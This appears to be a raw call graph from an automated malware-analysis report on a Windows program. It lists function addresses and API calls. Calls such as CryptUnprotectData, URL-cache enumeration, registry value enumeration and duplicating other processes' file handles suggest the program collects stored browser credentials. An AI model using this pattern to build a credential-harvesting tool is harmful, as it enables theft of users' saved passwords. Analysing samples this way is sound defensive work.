40bb3e memset memcpy 39304 40a734 MultiByteToWideChar 38714->39304 38716 40bb88 LocalFree 38716->38719 38719->38697 38719->38698 38719->38701 38719->38704 38719->38705 38719->38708 38719->38709 38719->38710 38719->38713 38719->38714 38720 40ba5f memcmp 38719->38720 39294 4253ef 16 API calls 38719->39294 39295 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38719->39295 39296 4253af 17 API calls 38719->39296 39297 4253cf 17 API calls 38719->39297 39298 447280 memset 38719->39298 39299 447960 memset memcpy memcpy memcpy 38719->39299 39300 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38719->39300 39301 447920 memcpy memcpy memcpy 38719->39301 38720->38719 38721->38269 38723 40aebe FindClose 38722->38723 38724 40ae21 38723->38724 38725 4099c6 2 API calls 38724->38725 38726 40ae35 38725->38726 38727 409d1f 6 API calls 38726->38727 38728 40ae49 38727->38728 38728->38333 38730 40ade0 38729->38730 38731 40ae0f 38729->38731 38730->38731 38732 40ade7 wcscmp 38730->38732 38731->38333 38732->38731 38733 40adfe wcscmp 38732->38733 38733->38731 38735 40ae7b FindNextFileW 38734->38735 38736 40ae5c FindFirstFileW 38734->38736 38737 40ae8f 38735->38737 38738 40ae94 38735->38738 38736->38738 38739 40aebe FindClose 38737->38739 38740 40aeb6 38738->38740 38741 409d1f 6 API calls 38738->38741 38739->38738 38740->38333 38741->38740 38743 40aed1 38742->38743 38744 40aec7 FindClose 38742->38744 38743->38202 38744->38743 38746 4099d7 38745->38746 38747 4099da memcpy 38745->38747 38746->38747 38747->38252 38749 40b2cc 27 API calls 38748->38749 38750 44543f 38749->38750 38751 409d1f 6 API calls 38750->38751 38752 44544f 38751->38752 39690 409b98 GetFileAttributesW 38752->39690 38754 44545e 38755 445476 38754->38755 38756 40b6ef 249 API calls 38754->38756 38757 40b2cc 27 API calls 38755->38757 38756->38755 38758 445482 38757->38758 38759 409d1f 6 API calls 38758->38759 38760 445492 38759->38760 39691 409b98 GetFileAttributesW 38760->39691 38762 4454a1 38763 4454b9 38762->38763 38764 40b6ef 249 API calls 38762->38764 38763->38282 38764->38763 38765->38281 38766->38298 38767->38304 38768->38341 38769->38322 38770->38368 38771->38368 38772->38351 38773->38379 38774->38381 38775->38383 38777 414c2e 16 API calls 38776->38777 38778 40c2ae 38777->38778 38834 40c1d3 38778->38834 38783 40c3be 38800 40a8ab 38783->38800 38784 40afcf 2 API calls 38785 40c2fd FindFirstUrlCacheEntryW 38784->38785 38786 40c3b6 38785->38786 38787 40c31e wcschr 38785->38787 38788 40b04b ??3@YAXPAX 38786->38788 38789 40c331 38787->38789 38790 40c35e FindNextUrlCacheEntryW 38787->38790 38788->38783 38792 40a8ab 9 API calls 38789->38792 38790->38787 38791 40c373 GetLastError 38790->38791 38793 40c3ad FindCloseUrlCache 38791->38793 38794 40c37e 38791->38794 38795 40c33e wcschr 38792->38795 38793->38786 38796 40afcf 2 API calls 38794->38796 38795->38790 38797 40c34f 38795->38797 38798 40c391 FindNextUrlCacheEntryW 38796->38798 38799 40a8ab 9 API calls 38797->38799 38798->38787 38798->38793 38799->38790 38928 40a97a 38800->38928 38803 40a8cc 38803->38390 38804 40a8d0 7 API calls 38804->38803 38933 40b1ab ??3@YAXPAX ??3@YAXPAX 38805->38933 38807 40c3dd 38808 40b2cc 27 API calls 38807->38808 38809 40c3e7 38808->38809 38934 414592 RegOpenKeyExW 38809->38934 38811 40c3f4 38812 40c50e 38811->38812 38813 40c3ff 38811->38813 38827 405337 38812->38827 38814 40a9ce 4 API calls 38813->38814 38815 40c418 memset 38814->38815 38935 40aa1d 38815->38935 38818 40c471 38820 40c47a _wcsupr 38818->38820 38819 40c505 RegCloseKey 38819->38812 38821 40a8d0 7 API calls 38820->38821 38822 40c498 38821->38822 38823 40a8d0 7 API calls 38822->38823 38824 40c4ac memset 38823->38824 38825 40aa1d 38824->38825 38826 40c4e4 RegEnumValueW 38825->38826 38826->38819 38826->38820 38937 405220 38827->38937 38829 405340 38829->38404 38830->38401 38831->38403 38832->38404 38833->38397 38835 40ae18 9 API calls 38834->38835 38841 40c210 38835->38841 38836 40ae51 9 API calls 38836->38841 38837 40c264 38838 40aebe FindClose 38837->38838 38840 40c26f 38838->38840 38839 40add4 2 API calls 38839->38841 38846 40e5ed memset memset 38840->38846 38841->38836 38841->38837 38841->38839 38842 40c231 _wcsicmp 38841->38842 38843 40c1d3 34 API calls 38841->38843 38842->38841 38844 40c248 38842->38844 38843->38841 38859 40c084 21 API calls 38844->38859 38847 414c2e 16 API calls 38846->38847 38848 40e63f 38847->38848 38849 409d1f 6 API calls 38848->38849 38850 40e658 38849->38850 38860 409b98 GetFileAttributesW 38850->38860 38852 40e667 38853 40e680 38852->38853 38855 409d1f 6 API calls 38852->38855 38861 409b98 GetFileAttributesW 38853->38861 38855->38853 38856 40e68f 38858 40c2d8 38856->38858 38862 40e4b2 38856->38862 38858->38783 38858->38784 38859->38841 38860->38852 38861->38856 38883 40e01e 38862->38883 38864 40e593 38866 40e5b0 38864->38866 38867 40e59c DeleteFileW 38864->38867 38865 40e521 38865->38864 38906 40e175 38865->38906 38868 40b04b ??3@YAXPAX 38866->38868 38867->38866 38869 40e5bb 38868->38869 38871 40e5c4 CloseHandle 38869->38871 38872 40e5cc 38869->38872 38871->38872 38874 40b633 ??3@YAXPAX 38872->38874 38873 40e573 38876 40e584 38873->38876 38877 40e57c CloseHandle 38873->38877 38875 40e5db 38874->38875 38879 40b633 ??3@YAXPAX 38875->38879 38927 40b1ab ??3@YAXPAX ??3@YAXPAX 38876->38927 38877->38876 38878 40e540 38878->38873 38926 40e2ab 30 API calls 38878->38926 38881 40e5e3 38879->38881 38881->38858 38884 406214 22 API calls 38883->38884 38885 40e03c 38884->38885 38886 40e16b 38885->38886 38887 40dd85 60 API calls 38885->38887 38886->38865 38888 40e06b 38887->38888 38888->38886 38889 40afcf ??2@YAPAXI ??3@YAXPAX 38888->38889 38890 40e08d OpenProcess 38889->38890 38891 40e0a4 GetCurrentProcess DuplicateHandle 38890->38891 38895 40e152 38890->38895 38892 40e0d0 GetFileSize 38891->38892 38893 40e14a CloseHandle 38891->38893 38896 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38892->38896 38893->38895 38894 40e160 38898 40b04b ??3@YAXPAX 38894->38898 38895->38894 38897 406214 22 API calls 38895->38897 38899 40e0ea 38896->38899 38897->38894 38898->38886 38900 4096dc CreateFileW 38899->38900 38901 40e0f1 CreateFileMappingW 38900->38901 38902 40e140 CloseHandle CloseHandle 38901->38902 38903 40e10b MapViewOfFile 38901->38903 38902->38893 38904 40e13b CloseHandle 38903->38904 38905 40e11f WriteFile UnmapViewOfFile 38903->38905 38904->38902 38905->38904 38907 40e18c 38906->38907 38908 406b90 11 API calls 38907->38908 38909 40e19f 38908->38909 38910 40e1a7 memset 38909->38910 38911 40e299 38909->38911 38916 40e1e8 38910->38916 38912 4069a3 ??3@YAXPAX ??3@YAXPAX 38911->38912 38913 40e2a4 38912->38913 38913->38878 38914 406e8f 13 API calls 38914->38916 38915 406b53 SetFilePointerEx ReadFile 38915->38916 38916->38914 38916->38915 38917 40dd50 _wcsicmp 38916->38917 38918 40e283 38916->38918 38922 40742e 8 API calls 38916->38922 38923 40aae3 wcslen wcslen _memicmp 38916->38923 38924 40e244 _snwprintf 38916->38924 38917->38916 38919 40e291 38918->38919 38920 40e288 ??3@YAXPAX 38918->38920 38921 40aa04 ??3@YAXPAX 38919->38921 38920->38919 38921->38911 38922->38916 38923->38916 38925 40a8d0 7 API calls 38924->38925 38925->38916 38926->38878 38927->38864 38929 40a980 38928->38929 38930 40a995 _wcsicmp 38929->38930 38931 40a99c wcscmp 38929->38931 38932 40a8bb 38929->38932 38930->38929 38931->38929 38932->38803 38932->38804 38933->38807 38934->38811 38936 40aa23 RegEnumValueW 38935->38936 38936->38818 38936->38819 38938 40522a 38937->38938 38963 405329 38937->38963 38939 40b2cc 27 API calls 38938->38939 38940 405234 38939->38940 38941 40a804 8 API calls 38940->38941 38942 40523a 38941->38942 38964 40b273 38942->38964 38944 405248 _mbscpy _mbscat 38945 40526c 38944->38945 38946 40b273 27 API calls 38945->38946 38947 405279 38946->38947 38948 40b273 27 API calls 38947->38948 38949 40528f 38948->38949 38950 40b273 27 API calls 38949->38950 38951 4052a5 38950->38951 38952 40b273 27 API calls 38951->38952 38953 4052bb 38952->38953 38954 40b273 27 API calls 38953->38954 38955 4052d1 38954->38955 38956 40b273 27 API calls 38955->38956 38957 4052e7 38956->38957 38958 40b273 27 API calls 38957->38958 38959 4052fd 38958->38959 38960 40b273 27 API calls 38959->38960 38961 405313 38960->38961 38962 40b273 27 API calls 38961->38962 38962->38963 38963->38829 38965 40b58d 27 API calls 38964->38965 38966 40b18c 38965->38966 38966->38944 38968 40440c FreeLibrary 38967->38968 38969 40436d 38968->38969 38970 40a804 8 API calls 38969->38970 38971 404377 38970->38971 38972 4043f7 38971->38972 38973 40b273 27 API calls 38971->38973 38972->38408 38972->38412 38974 40438d 38973->38974 38975 40b273 27 API calls 38974->38975 38976 4043a7 38975->38976 38977 40b273 27 API calls 38976->38977 38978 4043ba 38977->38978 38979 40b273 27 API calls 38978->38979 38980 4043ce 38979->38980 38981 40b273 27 API calls 38980->38981 38982 4043e2 38981->38982 38982->38972 38983 40440c FreeLibrary 38982->38983 38983->38972 38985 404413 FreeLibrary 38984->38985 38986 40441e 38984->38986 38985->38986 38986->38424 38987->38420 38989 40447e 38988->38989 38990 40442e 38988->38990 38991 404485 CryptUnprotectData 38989->38991 38992 40449c 38989->38992 38993 40b2cc 27 API calls 38990->38993 38991->38992 38992->38420 38994 404438 38993->38994 38995 40a804 8 API calls 38994->38995 38996 40443e 38995->38996 38997 40444f 38996->38997 38998 40b273 27 API calls 38996->38998 38997->38989 38999 404475 FreeLibrary 38997->38999 38998->38997 38999->38989 39001 4135f6 39000->39001 39002 4135eb FreeLibrary 39000->39002 39001->38427 39002->39001 39004 4449c4 39003->39004 39005 444a48 39003->39005 39006 40b2cc 27 API calls 39004->39006 39005->38447 39005->38448 39007 4449cb 39006->39007 39008 40a804 8 API calls 39007->39008 39009 4449d1 39008->39009 39010 40b273 27 API calls 39009->39010 39011 4449dc 39010->39011 39012 40b273 27 API calls 39011->39012 39013 4449f3 39012->39013 39023->38458 39024->38458 39025->38458 39026->38458 39027->38449 39029 403a29 39028->39029 39043 403bed memset memset 39029->39043 39031 403ae7 39056 40b1ab ??3@YAXPAX ??3@YAXPAX 39031->39056 39033 403a3f memset 39038 403a2f 39033->39038 39034 403aef 39034->38466 39035 409d1f 6 API calls 39035->39038 39036 409b98 GetFileAttributesW 39036->39038 39037 40a8d0 7 API calls 39037->39038 39038->39031 39038->39033 39038->39035 39038->39036 39038->39037 39040 40a051 GetFileTime CloseHandle 39039->39040 39041 4039ca CompareFileTime 39039->39041 39040->39041 39041->38466 39042->38465 39044 414c2e 16 API calls 39043->39044 39045 403c38 39044->39045 39046 409719 2 API calls 39045->39046 39047 403c3f wcscat 39046->39047 39048 414c2e 16 API calls 39047->39048 39049 403c61 39048->39049 39050 409719 2 API calls 39049->39050 39051 403c68 wcscat 39050->39051 39057 403af5 39051->39057 39054 403af5 20 API calls 39055 403c95 39054->39055 39055->39038 39056->39034 39058 403b02 39057->39058 39059 40ae18 9 API calls 39058->39059 39065 403b37 39059->39065 39060 40ae51 9 API calls 39060->39065 39061 403bdb 39062 40aebe FindClose 39061->39062 39063 403be6 39062->39063 39063->39054 39064 40ae18 9 API calls 39064->39065 39065->39060 39065->39061 39065->39064 39066 40add4 wcscmp wcscmp 39065->39066 39067 40aebe FindClose 39065->39067 39068 40a8d0 7 API calls 39065->39068 39066->39065 39067->39065 39068->39065 39070 409d1f 6 API calls 39069->39070 39071 404190 39070->39071 39084 409b98 GetFileAttributesW 39071->39084 39073 40419c 39074 4041a7 6 API calls 39073->39074 39075 40435c 39073->39075 39076 40424f 39074->39076 39075->38491 39076->39075 39078 40425e memset 39076->39078 39080 409d1f 6 API calls 39076->39080 39081 40a8ab 9 API calls 39076->39081 39085 414842 39076->39085 39078->39076 39079 404296 wcscpy 39078->39079 39079->39076 39080->39076 39082 4042b6 memset memset _snwprintf wcscpy 39081->39082 39082->39076 39083->38490 39084->39073 39088 41443e 39085->39088 39087 414866 39087->39076 39089 41444b 39088->39089 39090 414451 39089->39090 39091 4144a3 GetPrivateProfileStringW 39089->39091 39092 414491 39090->39092 39093 414455 wcschr 39090->39093 39091->39087 39095 414495 WritePrivateProfileStringW 39092->39095 39093->39092 39094 414463 _snwprintf 39093->39094 39094->39095 39095->39087 39096->38496 39098 40b2cc 27 API calls 39097->39098 39099 409615 39098->39099 39100 409d1f 6 API calls 39099->39100 39101 409625 39100->39101 39124 409b98 GetFileAttributesW 39101->39124 39103 409634 39104 409648 39103->39104 39141 4091b8 238 API calls 39103->39141 39106 40b2cc 27 API calls 39104->39106 39112 408801 39104->39112 39107 40965d 39106->39107 39108 409d1f 6 API calls 39107->39108 39109 40966d 39108->39109 39125 409b98 GetFileAttributesW 39109->39125 39111 40967c 39111->39112 39126 409529 39111->39126 39112->38499 39112->38543 39124->39103 39125->39111 39142 4096c3 CreateFileW 39126->39142 39128 409543 39129 409550 GetFileSize 39128->39129 39140 4095cd 39128->39140 39130 409577 CloseHandle 39129->39130 39131 40955f 39129->39131 39136 409585 39130->39136 39130->39140 39132 40afcf 2 API calls 39131->39132 39133 409569 39132->39133 39143 40a2ef ReadFile 39133->39143 39135 409574 39135->39130 39137 4095c3 39136->39137 39136->39140 39144 408b8d 38 API calls 39136->39144 39145 40908b 55 API calls 39137->39145 39140->39112 39141->39104 39142->39128 39143->39135 39144->39136 39145->39140 39173 413f4f 39146->39173 39149 413f37 K32GetModuleFileNameExW 39150 413f4a 39149->39150 39150->38558 39152 413969 wcscpy 39151->39152 39153 41396c wcschr 39151->39153 39156 413a3a 39152->39156 39153->39152 39155 41398e 39153->39155 39177 4097f7 wcslen wcslen _memicmp 39155->39177 39156->38558 39158 41399a 39159 4139a4 memset 39158->39159 39160 4139e6 39158->39160 39178 409dd5 GetWindowsDirectoryW wcscpy 39159->39178 39162 413a31 wcscpy 39160->39162 39163 4139ec memset 39160->39163 39162->39156 39179 409dd5 GetWindowsDirectoryW wcscpy 39163->39179 39165 4139c9 wcscpy wcscat 39165->39156 39166 413a11 memcpy wcscat 39166->39156 39168 413cb0 GetModuleHandleW 39167->39168 39169 413cda 39167->39169 39168->39169 39170 413cbf 39168->39170 39171 413ce3 GetProcessTimes 39169->39171 39172 413cf6 39169->39172 39170->39169 39171->38562 39172->38562 39174 413f54 39173->39174 39176 413f2f 39173->39176 39175 40a804 8 API calls 39174->39175 39175->39176 39176->39149 39176->39150 39177->39158 39178->39165 39179->39166 39180->38583 39181->38606 39183 409cf9 GetVersionExW 39182->39183 39184 409d0a 39182->39184 39183->39184 39184->38612 39184->38617 39185->38618 39186->38622 39187->38624 39188->38669 39190 40bba5 39189->39190 39305 40cc26 39190->39305 39193 40bd4b 39326 40cc0c 39193->39326 39198 40b2cc 27 API calls 39199 40bbef 39198->39199 39333 40ccf0 _wcsicmp 39199->39333 39201 40bbf5 39201->39193 39334 40ccb4 6 API calls 39201->39334 39203 40bc26 39204 40cf04 17 API calls 39203->39204 39205 40bc2e 39204->39205 39206 40bd43 39205->39206 39207 40b2cc 27 API calls 39205->39207 39208 40cc0c 4 API calls 39206->39208 39209 40bc40 39207->39209 39208->39193 39335 40ccf0 _wcsicmp 39209->39335 39211 40bc46 39211->39206 39212 40bc61 memset memset WideCharToMultiByte 39211->39212 39336 40103c strlen 39212->39336 39214 40bcc0 39215 40b273 27 API calls 39214->39215 39216 40bcd0 memcmp 39215->39216 39216->39206 39217 40bce2 39216->39217 39218 404423 37 API calls 39217->39218 39219 40bd10 39218->39219 39219->39206 39220 40bd3a LocalFree 39219->39220 39221 40bd1f memcpy 39219->39221 39220->39206 39221->39220 39222->38683 39396 4438b5 39223->39396 39225 44444c 39226 40b879 39225->39226 39410 415a6d 39225->39410 39226->38687 39226->38688 39229 444486 39231 4444b9 memcpy 39229->39231 39233 4444a4 39229->39233 39230 44469e 39230->39226 39465 443d90 110 API calls 39230->39465 39414 415258 39231->39414 39464 4442e6 11 API calls 39233->39464 39235 444524 39236 444541 39235->39236 39237 44452a 39235->39237 39417 444316 39236->39417 39451 416935 39237->39451 39241 444316 18 API calls 39242 444563 39241->39242 39243 444316 18 API calls 39242->39243 39244 44456f 39243->39244 39245 444316 18 API calls 39244->39245 39246 44457f 39245->39246 39246->39233 39431 432d4e 39246->39431 39249 444316 18 API calls 39250 4445b0 39249->39250 39435 41eed2 39250->39435 39252 4445cf 39253 4445d6 39252->39253 39254 4445ee 39252->39254 39256 416935 16 API calls 39253->39256 39459 43302c memset 39254->39459 39256->39233 39257 4445fa 39460 43302c memset 39257->39460 39259 444609 39259->39233 39260 416935 16 API calls 39259->39260 39261 444646 39260->39261 39522 438460 39269->39522 39271 40b8a4 39271->38694 39275 4251c4 39271->39275 39273 409a74 GetTempFileNameW 39272->39273 39274 409a66 GetWindowsDirectoryW 39272->39274 39273->38682 39274->39273 39616 424f07 39275->39616 39277 4251e4 39278 4251f7 39277->39278 39279 4251e8 39277->39279 39624 4250f8 39278->39624 39623 4446ea 11 API calls 39279->39623 39281 4251f2 39281->38719 39283 425209 39286 425249 39283->39286 39289 4250f8 126 API calls 39283->39289 39290 425287 39283->39290 39632 4384e9 134 API calls 39283->39632 39633 424f74 123 API calls 39283->39633 39286->39290 39634 424ff0 13 API calls 39286->39634 39289->39283 39636 415c7d 16 API calls 39290->39636 39291 425266 39291->39290 39635 415be9 memcpy 39291->39635 39293->38719 39294->38719 39295->38719 39296->38719 39297->38719 39298->38719 39299->38719 39300->38719 39301->38719 39302->38694 39303->38687 39304->38716 39337 4096c3 CreateFileW 39305->39337 39307 40cc34 39308 40cc3d GetFileSize 39307->39308 39310 40bbca 39307->39310 39309 40afcf 2 API calls 39308->39309 39311 40cc64 39309->39311 39310->39193 39317 40cf04 39310->39317 39338 40a2ef ReadFile 39311->39338 39313 40cc71 39339 40ab4a MultiByteToWideChar 39313->39339 39315 40cc95 CloseHandle 39316 40b04b ??3@YAXPAX 39315->39316 39316->39310 39318 40b633 ??3@YAXPAX 39317->39318 39319 40cf14 39318->39319 39345 40b1ab ??3@YAXPAX ??3@YAXPAX 39319->39345 39321 40cf1b 39322 40bbdd 39321->39322 39324 40cfef 39321->39324 39346 40cd4b 39321->39346 39322->39193 39322->39198 39325 40cd4b 14 API calls 39324->39325 39325->39322 39327 40b633 ??3@YAXPAX 39326->39327 39328 40cc15 39327->39328 39329 40aa04 ??3@YAXPAX 39328->39329 39330 40cc1d 39329->39330 39395 40b1ab ??3@YAXPAX ??3@YAXPAX 39330->39395 39332 40b7d4 memset CreateFileW 39332->38675 39332->38676 39333->39201 39334->39203 39335->39211 39336->39214 39337->39307 39338->39313 39340 40ab6b 39339->39340 39344 40ab93 39339->39344 39341 40a9ce 4 API calls 39340->39341 39342 40ab74 39341->39342 39343 40ab7c MultiByteToWideChar 39342->39343 39343->39344 39344->39315 39345->39321 39347 40cd7b 39346->39347 39380 40aa29 39347->39380 39349 40cef5 39350 40aa04 ??3@YAXPAX 39349->39350 39351 40cefd 39350->39351 39351->39321 39353 40aa29 6 API calls 39354 40ce1d 39353->39354 39355 40aa29 6 API calls 39354->39355 39356 40ce3e 39355->39356 39359 40ce6a 39356->39359 39388 40abb7 wcslen memmove 39356->39388 39357 40ce9f 39360 40a8d0 7 API calls 39357->39360 39359->39357 39391 40abb7 wcslen memmove 39359->39391 39363 40ceb5 39360->39363 39361 40ce56 39389 40aa71 wcslen 39361->39389 39369 40a8d0 7 API calls 39363->39369 39365 40ce8b 39392 40aa71 wcslen 39365->39392 39366 40ce5e 39390 40abb7 wcslen memmove 39366->39390 39371 40cecb 39369->39371 39370 40ce93 39393 40abb7 wcslen memmove 39370->39393 39394 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39371->39394 39374 40cedd 39375 40aa04 ??3@YAXPAX 39374->39375 39376 40cee5 39375->39376 39377 40aa04 ??3@YAXPAX 39376->39377 39378 40ceed 39377->39378 39379 40aa04 ??3@YAXPAX 39378->39379 39379->39349 39381 40aa33 39380->39381 39382 40aa63 39380->39382 39383 40aa44 39381->39383 39384 40aa38 wcslen 39381->39384 39382->39349 39382->39353 39385 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39383->39385 39384->39383 39386 40aa4d 39385->39386 39386->39382 39387 40aa51 memcpy 39386->39387 39387->39382 39388->39361 39389->39366 39390->39359 39391->39365 39392->39370 39393->39357 39394->39374 39395->39332 39397 4438d0 39396->39397 39398 4438c9 39396->39398 39466 415378 memcpy memcpy 39397->39466 39398->39225 39411 415a77 39410->39411 39412 415a8d 39411->39412 39413 415a7e memset 39411->39413 39412->39229 39413->39412 39415 4438b5 11 API calls 39414->39415 39416 41525d 39415->39416 39416->39235 39418 444328 39417->39418 39419 444423 39418->39419 39420 44434e 39418->39420 39467 4446ea 11 API calls 39419->39467 39422 432d4e 3 API calls 39420->39422 39423 44435a 39422->39423 39426 444375 39423->39426 39430 44438b 39423->39430 39424 444381 39424->39241 39425 432d4e 3 API calls 39427 4443ec 39425->39427 39428 416935 16 API calls 39426->39428 39427->39424 39429 416935 16 API calls 39427->39429 39428->39424 39429->39424 39430->39425 39432 432d65 39431->39432 39433 432d58 39431->39433 39432->39249 39468 432cc4 memset memset memcpy 39433->39468 39436 41eee2 39435->39436 39437 415a6d memset 39436->39437 39438 41ef23 39437->39438 39439 415a6d memset 39438->39439 39450 41ef2d 39438->39450 39440 41ef42 39439->39440 39443 41ef49 39440->39443 39469 41b7d9 39440->39469 39442 41ef66 39442->39443 39444 41ef74 memset 39442->39444 39443->39450 39487 41b321 100 API calls 39443->39487 39446 41ef91 39444->39446 39448 41ef9e 39444->39448 39483 41519d 39446->39483 39448->39443 39486 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39448->39486 39450->39252 39452 41693e 39451->39452 39456 41698e 39451->39456 39453 41694c 39452->39453 39501 422fd1 memset 39452->39501 39453->39456 39502 4165a0 39453->39502 39456->39233 39459->39257 39460->39259 39464->39230 39465->39226 39467->39424 39468->39432 39475 41b812 39469->39475 39470 415a6d memset 39471 41b8c2 39470->39471 39472 41b980 39471->39472 39473 41b902 memcpy memcpy memcpy memcpy memcpy 39471->39473 39479 41b849 39471->39479 39481 41b9ad 39472->39481 39489 4151e3 39472->39489 39473->39472 39475->39479 39482 41b884 39475->39482 39488 444706 11 API calls 39475->39488 39479->39442 39481->39479 39492 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39481->39492 39482->39470 39482->39479 39486->39443 39487->39450 39488->39482 39491 41837f 54 API calls 39489->39491 39501->39453 39508 415cfe 39502->39508 39507 422b84 15 API calls 39507->39456 39511 415d23 __aullrem __aulldvrm 39508->39511 39514 41628e 39508->39514 39509 4163ca 39510 416422 10 API calls 39509->39510 39510->39514 39511->39509 39512 416172 memset 39511->39512 39513 416422 10 API calls 39511->39513 39511->39514 39515 415cb9 10 API calls 39511->39515 39512->39511 39513->39511 39516 416520 39514->39516 39515->39511 39517 416527 39516->39517 39521 416574 39516->39521 39518 415700 10 API calls 39517->39518 39519 416544 39517->39519 39517->39521 39518->39519 39520 416561 memcpy 39519->39520 39519->39521 39520->39521 39521->39456 39521->39507 39534 41703f 39522->39534 39524 43847a 39525 43848a 39524->39525 39526 43847e 39524->39526 39541 438270 39525->39541 39571 4446ea 11 API calls 39526->39571 39530 438488 39530->39271 39532 4384bb 39533 438270 133 API calls 39532->39533 39533->39530 39535 417044 39534->39535 39536 41705c 39534->39536 39540 417055 39535->39540 39573 416760 11 API calls 39535->39573 39537 417075 39536->39537 39574 41707a 11 API calls 39536->39574 39537->39524 39540->39524 39575 415a91 39541->39575 39543 43828d 39544 438297 39543->39544 39545 438341 39543->39545 39547 4382d6 39543->39547 39615 415c7d 16 API calls 39544->39615 39579 44358f 39545->39579 39550 4382fb 39547->39550 39551 4382db 39547->39551 39549 438458 39549->39530 39572 424f26 122 API calls 39549->39572 39611 415c23 memcpy 39550->39611 39552 416935 16 API calls 39551->39552 39554 4382e9 39552->39554 39610 415c7d 16 API calls 39554->39610 39555 438305 39558 44358f 19 API calls 39555->39558 39560 438318 39555->39560 39557 438373 39564 438383 39557->39564 39612 4300e8 memset memset memcpy 39557->39612 39558->39560 39560->39557 39605 43819e 39560->39605 39562 4383f5 39567 438404 39562->39567 39568 43841c 39562->39568 39563 4383cd 39563->39562 39614 42453e 122 API calls 39563->39614 39564->39563 39613 415c23 memcpy 39564->39613 39570 416935 16 API calls 39567->39570 39569 416935 16 API calls 39568->39569 39569->39544 39570->39544 39571->39530 39572->39532 39573->39540 39574->39535 39576 415a9d 39575->39576 39577 415ab3 39576->39577 39578 415aa4 memset 39576->39578 39577->39543 39578->39577 39580 4435be 39579->39580 39584 4436ce 39580->39584 39586 442ff8 19 API calls 39580->39586 39588 44366c 39580->39588 39593 443676 39580->39593 39603 44360c 39580->39603 39581 441409 memset 39587 443758 39581->39587 39582 443737 39583 442ff8 19 API calls 39582->39583 39583->39587 39590 4165ff 11 API calls 39584->39590 39585 442ff8 19 API calls 39585->39582 39586->39580 39587->39581 39594 443775 39587->39594 39591 4169a7 11 API calls 39588->39591 39589 4437be 39592 416760 11 API calls 39589->39592 39595 4437de 39589->39595 39590->39593 39591->39593 39592->39595 39593->39582 39593->39585 39593->39587 39594->39589 39598 415c56 11 API calls 39594->39598 39597 443801 39595->39597 39599 42463b memset memcpy 39595->39599 39596 443826 39601 43bd08 memset 39596->39601 39597->39596 39600 43024d memset 39597->39600 39598->39589 39599->39597 39600->39596 39602 443837 39601->39602 39602->39603 39604 43024d memset 39602->39604 39603->39560 39604->39602 39606 438246 39605->39606 39608 4381ba 39605->39608 39606->39557 39607 41f432 109 API calls 39607->39608 39608->39606 39608->39607 39609 41f638 103 API calls 39608->39609 39609->39608 39610->39544 39611->39555 39612->39564 39613->39563 39614->39562 39615->39549 39617 424f1f 39616->39617 39618 424f0c 39616->39618 39638 424eea 11 API calls 39617->39638 39637 416760 11 API calls 39618->39637 39621 424f18 39621->39277 39622 424f24 39622->39277 39623->39281 39625 425108 39624->39625 39631 42510d 39624->39631 39671 424f74 123 API calls 39625->39671 39628 42516e 39672 415c7d 16 API calls 39628->39672 39629 425115 39629->39283 39631->39629 39639 42569b 39631->39639 39632->39283 39633->39283 39634->39291 39635->39290 39636->39281 39637->39621 39638->39622 39652 4256f1 39639->39652 39667 4259c2 39639->39667 39640 429ac1 39666 425ad6 39640->39666 39689 415c56 11 API calls 39640->39689 39645 4259da 39683 416760 11 API calls 39645->39683 39646 4260dd 39684 424251 119 API calls 39646->39684 39647 429a4d 39653 429a66 39647->39653 39654 429a9b 39647->39654 39651 422aeb memset memcpy memcpy 39651->39652 39652->39640 39652->39645 39652->39647 39652->39651 39656 4260a1 39652->39656 39652->39667 39670 425a38 39652->39670 39673 4227f0 memset memcpy 39652->39673 39674 422b84 15 API calls 39652->39674 39675 422b5d memset memcpy memcpy 39652->39675 39676 422640 13 API calls 39652->39676 39678 4241fc 11 API calls 39652->39678 39679 42413a 89 API calls 39652->39679 39685 415c56 11 API calls 39653->39685 39658 429a96 39654->39658 39687 416760 11 API calls 39654->39687 39682 415c56 11 API calls 39656->39682 39688 424251 119 API calls 39658->39688 39662 429a7a 39686 416760 11 API calls 39662->39686 39666->39628 39667->39666 39677 415c56 11 API calls 39667->39677 39670->39667 39680 422640 13 API calls 39670->39680 39681 4226e0 12 API calls 39670->39681 39671->39631 39672->39629 39673->39652 39674->39652 39675->39652 39676->39652 39677->39645 39678->39652 39679->39652 39680->39670 39681->39670 39682->39645 39683->39646 39684->39666 39685->39662 39686->39658 39687->39658 39688->39640 39689->39645 39690->38754 39691->38762 39692 44dea5 39693 44deb5 FreeLibrary 39692->39693 39694 44dec3 39692->39694 39693->39694 39695 4147f3 39698 414561 39695->39698 39697 414813 39699 41456d 39698->39699 39700 41457f GetPrivateProfileIntW 39698->39700 39703 4143f1 memset _itow WritePrivateProfileStringW 39699->39703 39700->39697 39702 41457a 39702->39697 39703->39702 39704 44def7 39705 44df07 39704->39705 39706 44df00 ??3@YAXPAX 39704->39706 39707 44df17 39705->39707 39708 44df10 ??3@YAXPAX 39705->39708 39706->39705 39709 44df27 39707->39709 39710 44df20 ??3@YAXPAX 39707->39710 39708->39707 39711 44df37 39709->39711 39712 44df30 ??3@YAXPAX 39709->39712 39710->39709 39712->39711 39713 4287c1 39714 4287d2 39713->39714 39715 429ac1 39713->39715 39716 428818 39714->39716 39717 42881f 39714->39717 39732 425711 39714->39732 39727 425ad6 39715->39727 39783 415c56 11 API calls 39715->39783 39750 42013a 39716->39750 39778 420244 96 API calls 39717->39778 39721 4260dd 39777 424251 119 API calls 39721->39777 39723 4259da 39776 416760 11 API calls 39723->39776 39728 429a4d 39733 429a66 39728->39733 39734 429a9b 39728->39734 39731 422aeb memset memcpy memcpy 39731->39732 39732->39715 39732->39723 39732->39728 39732->39731 39736 4260a1 39732->39736 39746 4259c2 39732->39746 39749 425a38 39732->39749 39766 4227f0 memset memcpy 39732->39766 39767 422b84 15 API calls 39732->39767 39768 422b5d memset memcpy memcpy 39732->39768 39769 422640 13 API calls 39732->39769 39771 4241fc 11 API calls 39732->39771 39772 42413a 89 API calls 39732->39772 39779 415c56 11 API calls 39733->39779 39738 429a96 39734->39738 39781 416760 11 API calls 39734->39781 39775 415c56 11 API calls 39736->39775 39782 424251 119 API calls 39738->39782 39742 429a7a 39780 416760 